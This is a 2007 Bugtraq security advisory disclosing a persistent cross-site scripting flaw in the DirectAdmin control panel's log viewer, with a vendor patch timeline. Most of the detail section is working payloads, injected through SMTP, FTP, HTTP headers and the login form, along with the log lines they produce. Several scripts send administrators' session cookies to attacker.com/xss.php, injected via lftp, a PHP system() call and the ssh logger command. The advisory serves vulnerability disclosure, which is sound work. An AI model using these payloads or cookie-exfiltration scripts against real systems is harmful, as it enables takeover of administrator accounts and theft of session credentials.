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Message-ID: <Pine.LNX.4.64N.0704010524010.22165@cebula>
Date: Sun, 1 Apr 2007 05:36:44 +0200 (CEST)
From: Kanedaaa Bohater <kaneda@...ater.net>
To: bugtraq@...urityfocus.com
Subject: DirectAdmin persistant XSS [takeover an Administrator`s account]
+ Subject:
DirectAdmin persistant XSS [takeover an Administrator`s account]
+ Version:
< DirectAdmin 1.29.3
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ DirectAdmin Description:
DirectAdmin is a popular, advanced Web Control Panel with many features
for webhosting. www.directadmin.com
+ Persistant XSS Description:
It is possible to take over an Administrator`s account by injecting
persistent XSS data to the System Logs [/var/log/*].
When DirectAdmin's Administrator goes to Admin Tools/Log Viewer and press
"Show log" to display logs - he can be a victim of XSS attack and his
session can be easily taken over - which means that it is possible to run
any command with DirectAdmin's Administrator priviliges.
I found out that 7 from 15 log files in the menu, could be used as means
of injecting XSS to a system with no login credentials required.
Next 3 of them are possible to be injected when you are logged as a valid
user in the DirectAdmin.
I was testing DirectAdmin on default Debian 4.0 installation but in
general it should be working for other platforms too (with small changes I
guess).
Details:
I) Examples of an attack without login credentials:
1)
Log file: /var/log/exim/rejectlog, /var/log/exim/mainlog
Data is sent to IP with DirectAdmin to port 25:
vrfy </textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
mainlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>
rejectlog: 2007-03-23 19:24:49 H=attacker.com [123.123.123.123] rejected
VRFY </textarea><script>alert('0wned:'+escape(document.cookie));</script>
2)
Log file: /var/log/proftpd/auth.log
Data is sent to IP with DirectAdmin to port 21:
user </textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
auth.log:ProFTPd [28114] 123.123.123.123 [23/Mar/2007:19:29:26 +0100]
"USER </textarea><script>alert('0wned:'+escape(document.cookie));</script>" 331
3)
Log file: /var/log/httpd/error_log
Data is sent to IP with DirectAdmin to port 80:
GET / </textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
error_log:[Fri Mar 23 19:33:37 2007] [error] [client 123.123.123.123]
request failed: erroneous characters after protocol string: GET /
</textarea><script>alert('0wned:'+escape(document.cookie));</script>
4)
Log file: /var/log/httpd/access_Log
Data is sent to "free (not attached to any user)" IP to port 80 (using
wget):
wget IP
--user-agent="</textarea><script>alert('0wned:'+escape(document.cookie));</script>"
Lines in log files:
access_log:123.123.123.123 - - [23/Mar/2007:19:36:46 +0100] "GET /
HTTP/1.0" 200 2673 "-"
"</textarea><script>alert('0wned:'+escape(document.cookie));</script>"
5)
Log file: /var/log/directadmin/error.log
Data is sent to first DirectAdmin login page:
login:
</textarea><script>alert('0wned:'+escape(document.cookie));</script>
password: any (not empty)
Lines in log files:
error.log:2007:03:23-19:39:44: Auth::passValid: unable to get user_info
for </textarea><script>alert('0wned:'+escape(document.cookie));</script>
6)
Log file: /var/log/directadmin/security.log
Data is sent to first DirectAdmin login page:
login:
</textarea><script>alert('0wned:'+escape(document.cookie));</script>
Lines in log files:
security.log:2007:03:23-19:39:44: *** 123.123.123.123 has tried to login
with an invalid username:
'</textarea><script>alert('0wned:'+escape(document.cookie));</script>' ***
II) Examples of an attack with login credentials:
1)
Log file: /var/log/directadmin/security.log
Via WWW:
http://directadminsite:2222/CMD_ADDITIONAL_DOMAINS?domain=login.domain.com</textarea><script>alert('XSS');</script>
Via ftp login: lftp login@...ectadmin:/> get
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"
2)
Log file: /var/log/messages
via php: <?php system('/usr/bin/logger
"</textarea><script>location.href=\'http://attacker.com/xss.php?cook=\'+escape(document.cookie)</script>"');
?>
3)
Log file: /var/log/messages
via ssh: /usr/bin/logger
"</textarea><script>location.href='http://attacker.com/xss.php?cook='+escape(document.cookie)</script>"
Timeline:
2007.02.25 bug discovered
2007.03.00 bug tested
2007.03.23 bug sent via Technical Support mail from http://www.directadmin.com/support.html
2007.03.24 fast response after few hours from DirectAdmin : Thanks for the report. Fix will be out within a few hours with DA 1.29.3
2007.03.24 DirectAdmin 1.29.3 Patched - Overview : use html characters for log viewer, Description: Ensure all charcters are html encoded when viewing logs through the log viewer.
Original Advisory:
http://kaneda.bohater.net/security/20070323-directadmin_persistant_xss_takeover_administrator_account.php
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